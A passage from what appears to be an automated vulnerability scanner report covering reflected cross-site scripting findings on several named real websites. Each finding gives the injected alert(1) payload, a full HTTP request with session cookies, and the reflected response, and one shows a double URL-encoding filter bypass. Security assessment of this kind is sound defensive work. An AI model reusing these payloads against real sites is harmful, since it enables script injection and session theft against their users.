This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?pid=2&q=70654><script>alert(1)</script>1785e056dba with the stars" OR DWTS HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:26 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<input type=hidden name=q value=70654><script>alert(1)</script>1785e056dba>
...[SNIP]...

4.69. http://fanpeeps.com/media/ [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /media/

Issue detail

The value of the pid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e24a"><script>alert(1)</script>f5fa8790e72 was submitted in the pid parameter. This input was echoed as 3e24a\"><script>alert(1)</script>f5fa8790e72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/?pid=3e24a"><script>alert(1)</script>f5fa8790e72 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:43:50 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 18100

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...
<a href="?pid=3e24a\"><script>alert(1)</script>f5fa8790e72">
...[SNIP]...

4.70. http://fanpeeps.com/media/ [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /media/

Issue detail

The value of the pid request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload b65e9><script>alert(1)</script>c8988a3d600 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/?pid=b65e9><script>alert(1)</script>c8988a3d600 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:43:51 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 18452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<a rel=nofollow href=/?action=home&pid=-1&zpid=b65e9><script>alert(1)</script>c8988a3d600>
...[SNIP]...

4.71. http://img.mediaplex.com/content/0/13754/86576/FINS_phone_300x250.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/13754/86576/FINS_phone_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d6c1"%3balert(1)//a553d609cbe was submitted in the mpck parameter. This input was echoed as 4d6c1";alert(1)//a553d609cbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/13754/86576/FINS_phone_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D30400104d6c1"%3balert(1)//a553d609cbe&mpt=3040010&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/3/0/%2a/a%3B207642206%3B1-0%3B0%3B29270204%3B4307-300/250%3B33472683/33490561/1%3B%3B%7Eokv%3D%3B%21category%3D%3Bbiz%3D1053%3B%3B%3Bmc%3Db2pfreezone%3Btile%3D7%3Bsz%3D336x280%2C300x250%3B%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/business_econ_front;!category=;biz=1053;;;mc=b2pfreezone;tile=7;sz=336x280,300x250;ord=5370537053705370;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo3=13754:1281

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 10:13:10 GMT
Server: Apache
Last-Modified: Thu, 03 Feb 2011 20:44:51 GMT
ETag: "483399-b85-49b66d64a36c0"
Accept-Ranges: bytes
Content-Length: 6630
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
;29270204;4307-300/250;33472683/33490561/1;;~okv=;!category=;biz=1053;;;mc=b2pfreezone;tile=7;sz=336x280,300x250;;~aopt=6/1/ff/1;~sscs=?http://altfarm.mediaplex.com/ad/ck/13754-86576-1281-0?mpt=30400104d6c1";alert(1)//a553d609cbe\" target=\"_blank\">
...[SNIP]...

4.72. http://img.mediaplex.com/content/0/13754/86576/FINS_phone_300x250.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/13754/86576/FINS_phone_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe2e0"%3balert(1)//fbfb0034a22 was submitted in the mpvc parameter. This input was echoed as fe2e0";alert(1)//fbfb0034a22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/13754/86576/FINS_phone_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D3040010&mpt=3040010&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/3/0/%2a/a%3B207642206%3B1-0%3B0%3B29270204%3B4307-300/250%3B33472683/33490561/1%3B%3B%7Eokv%3D%3B%21category%3D%3Bbiz%3D1053%3B%3B%3Bmc%3Db2pfreezone%3Btile%3D7%3Bsz%3D336x280%2C300x250%3B%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3ffe2e0"%3balert(1)//fbfb0034a22 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/business_econ_front;!category=;biz=1053;;;mc=b2pfreezone;tile=7;sz=336x280,300x250;ord=5370537053705370;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo3=13754:1281

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 10:13:39 GMT
Server: Apache
Last-Modified: Thu, 03 Feb 2011 20:44:51 GMT
ETag: "483399-b85-49b66d64a36c0"
Accept-Ranges: bytes
Content-Length: 6606
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
http://ad.doubleclick.net/click;h=v8/3b07/3/0/*/a;207642206;1-0;0;29270204;4307-300/250;33472683/33490561/1;;~okv=;!category=;biz=1053;;;mc=b2pfreezone;tile=7;sz=336x280,300x250;;~aopt=6/1/ff/1;~sscs=?fe2e0";alert(1)//fbfb0034a22http://altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D3040010&clickTag=http://ad.doubleclick.net/click;h=v8/3b07/3/0/*/a;207642206;1-0;0;29270204;4307-300/250;33472683/33490561/1;;~okv=;!
...[SNIP]...

4.73. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 71ca7<script>alert(1)</script>631a598379a was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G0760871ca7<script>alert(1)</script>631a598379a HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 14 May 2011 10:09:19 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 15 May 2011 10:09:19 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 14 May 2011 10:09:19 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G0760871CA7<SCRIPT>ALERT(1)</SCRIPT>631A598379A" was not recognized.
*/

4.74. http://json6.ringrevenue.com/6/map_number [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://json6.ringrevenue.com
Path:   /6/map_number

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7eee0'%3balert(1)//7515d9488a3 was submitted in the REST URL parameter 2. This input was echoed as 7eee0';alert(1)//7515d9488a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /6/map_number7eee0'%3balert(1)//7515d9488a3?jsoncallback=jsonp1305377517510&_=1305377522381&av_id=5510&url=http%3A%2F%2Fwww.midphase.com%2F&referer= HTTP/1.1
Host: json6.ringrevenue.com
Proxy-Connection: keep-alive
Referer: http://www.midphase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Sat, 14 May 2011 12:53:45 GMT
P3P: CP="CAO DSP CURa ADMa DEVa OUR NOR DEM STA" policyref="/w3c/p3p.xml"
Server: Mongrel 1.1.5
Set-Cookie: theme=generic; domain=.ringrevenue.com; path=/; expires=Mon, 14-May-2012 12:53:46 GMT
Set-Cookie: _rr_session_id=f163055218661cc27b695a8178c22dcb; domain=.ringrevenue.com; path=/; HttpOnly
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Status: 404
Vary: Accept-Encoding
Via: 1.1 www.ringrevenue.com
Connection: keep-alive
Content-Length: 10306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
);
return false;
});


Application.cookie_domain = ".ringrevenue.com";


var ext_cookie_path = '/6/map_number7eee0';alert(1)//7515d9488a3';


Ext.state.Manager.setProvider( new Ext.state.CookieProvider(
{
expires: new Date(new Date().getTime()+(1000*60*60*24*365)), //365 days

...[SNIP]...

4.75. http://json6.ringrevenue.com/images/ringrevenue/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://json6.ringrevenue.com
Path:   /images/ringrevenue/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98cb3'%3balert(1)//7af160695df was submitted in the REST URL parameter 1. This input was echoed as 98cb3';alert(1)//7af160695df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images98cb3'%3balert(1)//7af160695df/ringrevenue/favicon.ico HTTP/1.1
Host: json6.ringrevenue.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: theme=generic; _rr_session_id=f163055218661cc27b695a8178c22dcb

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Sun, 15 May 2011 11:54:16 GMT
Server: Mongrel 1.1.5
Set-Cookie: theme=generic; domain=.ringrevenue.com; path=/; expires=Tue, 15-May-2012 11:54:16 GMT
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Status: 404
Vary: Accept-Encoding
Via: 1.1 www.ringrevenue.com
Connection: keep-alive
Content-Length: 10221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
rel' ) );
return false;
});


Application.cookie_domain = ".ringrevenue.com";


var ext_cookie_path = '/images98cb3';alert(1)//7af160695df/ringrevenue/favicon.ico';


Ext.state.Manager.setProvider( new Ext.state.CookieProvider(
{
expires: new Date(new Date().getTime()+(1000*60*60*24*365)
...[SNIP]...

4.76. http://json6.ringrevenue.com/images/ringrevenue/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://json6.ringrevenue.com
Path:   /images/ringrevenue/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2bab'%3balert(1)//5e51e295be2 was submitted in the REST URL parameter 2. This input was echoed as d2bab';alert(1)//5e51e295be2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/ringrevenued2bab'%3balert(1)//5e51e295be2/favicon.ico HTTP/1.1
Host: json6.ringrevenue.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: theme=generic; _rr_session_id=f163055218661cc27b695a8178c22dcb

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Sun, 15 May 2011 11:54:32 GMT
Server: Mongrel 1.1.5
Set-Cookie: theme=generic; domain=.ringrevenue.com; path=/; expires=Tue, 15-May-2012 11:54:32 GMT
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Status: 404
Vary: Accept-Encoding
Via: 1.1 www.ringrevenue.com
Connection: keep-alive
Content-Length: 10221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
return false;
});


Application.cookie_domain = ".ringrevenue.com";


var ext_cookie_path = '/images/ringrevenued2bab';alert(1)//5e51e295be2/favicon.ico';


Ext.state.Manager.setProvider( new Ext.state.CookieProvider(
{
expires: new Date(new Date().getTime()+(1000*60*60*24*365)), //365 day
...[SNIP]...

4.77. http://json6.ringrevenue.com/images/ringrevenue/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://json6.ringrevenue.com
Path:   /images/ringrevenue/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73596'%3balert(1)//3a3ddf7380 was submitted in the REST URL parameter 3. This input was echoed as 73596';alert(1)//3a3ddf7380 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/ringrevenue/favicon.ico73596'%3balert(1)//3a3ddf7380 HTTP/1.1
Host: json6.ringrevenue.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: theme=generic; _rr_session_id=f163055218661cc27b695a8178c22dcb

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Sun, 15 May 2011 11:54:48 GMT
Server: Mongrel 1.1.5
Set-Cookie: theme=generic; domain=.ringrevenue.com; path=/; expires=Tue, 15-May-2012 11:54:48 GMT
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Status: 404
Vary: Accept-Encoding
Via: 1.1 www.ringrevenue.com
Connection: keep-alive
Content-Length: 10219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
return false;
});


Application.cookie_domain = ".ringrevenue.com";


var ext_cookie_path = '/images/ringrevenue/favicon.ico73596';alert(1)//3a3ddf7380';


Ext.state.Manager.setProvider( new Ext.state.CookieProvider(
{
expires: new Date(new Date().getTime()+(1000*60*60*24*365)), //365 days

...[SNIP]...

4.78. http://jtools.smartmoney.com/marketspectrum/spectrumServer [jsoncallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://jtools.smartmoney.com
Path:   /marketspectrum/spectrumServer

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload 985ce<a>b6e12d05707 was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /marketspectrum/spectrumServer?action=mapData&src=marketdata&jsoncallback=985ce<a>b6e12d05707&_=1305368020020 HTTP/1.1
Host: jtools.smartmoney.com
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/?zone=intromessage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=65a08c08-94ef-4153-a49e-58cc26e0596f; smintromsg1=true; smintromsg1e=true; __utmz=205638161.1305368018.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205638161.1117820965.1305368018.1305368018.1305368018.1; __utmc=205638161; __utmb=205638161.1.10.1305368018

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 10:19:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Content-Length: 991
Set-Cookie: NSC_tnz-ksvo-iuuq=ffffffff09f93b9c45525d5f4f58455e445a4a423660;expires=Sat, 14-May-2011 10:34:57 GMT;path=/

985ce<a>b6e12d05707({"timeInfo":{"timestamp":"6:19am EDT, 5/14/2011","stamp":"1305368344337"},"data":{name: "THE MARKET", children:[{"name":"HEALTH CARE","value":"-0.21","size":"1970454016000"},{"name":"FINANCIAL","value
...[SNIP]...

4.79. http://realestate.wsj.com/item/822547 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://realestate.wsj.com
Path:   /item/822547

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bae6%2527%253balert%25281%2529%252f%252fa24dd948b41 was submitted in the REST URL parameter 2. This input was echoed as 5bae6';alert(1)//a24dd948b41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /item/8225475bae6%2527%253balert%25281%2529%252f%252fa24dd948b41?as%5Bcountry_code%5D=us&as%5Blocation%5D=10010&as%5Bsid%5D=56936&as%5Btransaction%5D=for-sale&item_offset=1 HTTP/1.1
Host: realestate.wsj.com
Proxy-Connection: keep-alive
Referer: http://realestate.wsj.com/for-sale/us/10010?sid=56936
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; wsjregion=na%2cus; s_vnum=1307959748765%26vn%3D1; s_dbfe=1305367748766; mbox=session#1305367797515-52119#1305370512|check#true#1305368712; DJSESSION=ORCS%3Dna%2Cus%7C%7CBIZO%3Dbiz%3D1053%3B%7C%7CFREEREGSCRIMCOUNT%3Dnull; rsi_csl=lA; rsi_segs=G07608_10001; _vanilla_ui_session=BAh7BzoPc2Vzc2lvbl9pZCIlMWJlN2U5NTA2ZjA1YmMyMzA4YjQwNTg1NjZhMTRkOTE6EF9jc3JmX3Rva2VuIjFaZENHYzV6UXpVWHU4OVFXOVRENWRtRnVVc2N4bUdpSVZ0eERiVGsrS0NrPQ%3D%3D--ac4298512308a102427d420d41ce51f58a11780e; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2233%22%2C%22high%22%3A%5B%2270%22%5D%2C%22low%22%3A%5B%2256%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DSat%2C%2014%20May%202011%2010%3A29%3A14%20GMT%7C%7CweatherCode%3D10005; s_cc=true; s_invisit=true; s_sq=djglobal%2Cdjwsj%3D%2526pid%253DWSJ_RE_Search%252520Results_List%2526pidt%253D1%2526oid%253Dhttp%25253A//realestate.wsj.com/item/822547%25253Fas%2525255Bcountry_code%2525255D%25253Dus%252526as%2525255Blocation%2525255D%25253D10010%252526as%2525255Bsid%2525255D%25253D569%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 10:50:52 GMT
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.2
ETag: "c93aaeef52300df5bbe4e172ec3d3c42"
X-Runtime: 364
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _vanilla_ui_session=BAh7BzoPc2Vzc2lvbl9pZCIlMWJlN2U5NTA2ZjA1YmMyMzA4YjQwNTg1NjZhMTRkOTE6EF9jc3JmX3Rva2VuIjFaZENHYzV6UXpVWHU4OVFXOVRENWRtRnVVc2N4bUdpSVZ0eERiVGsrS0NrPQ%3D%3D--ac4298512308a102427d420d41ce51f58a11780e; path=/; HttpOnly
ntCoent-Length: 69760
Status: 200
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 69760

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head
...[SNIP]...
sultList.resultIds = [83336];
               Search.start = 0;
       Search.rows = 1;
       Search.sorting = '';
       Search.map = 0;
       Search.transaction = 'for-sale';
       Search.facets.clear();
   Search.addFacet('id','8225475bae6';alert(1)//a24dd948b41');                Search.newSearch = true;
   </script>
...[SNIP]...

4.80. http://sbklivequoteserverdl.smartmoney.com/livequote/tokenJSON [jsoncallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://sbklivequoteserverdl.smartmoney.com
Path:   /livequote/tokenJSON

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload 3ecce<a>4f9c5407d3e was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /livequote/tokenJSON?list=NLS:AAPL,BAC,CSCO,F,GE,$I.DJI,$I.COMPX,$INX&jsoncallback=jQuery15106331928954459727_13053680199773ecce<a>4f9c5407d3e&_=1305368021618 HTTP/1.1
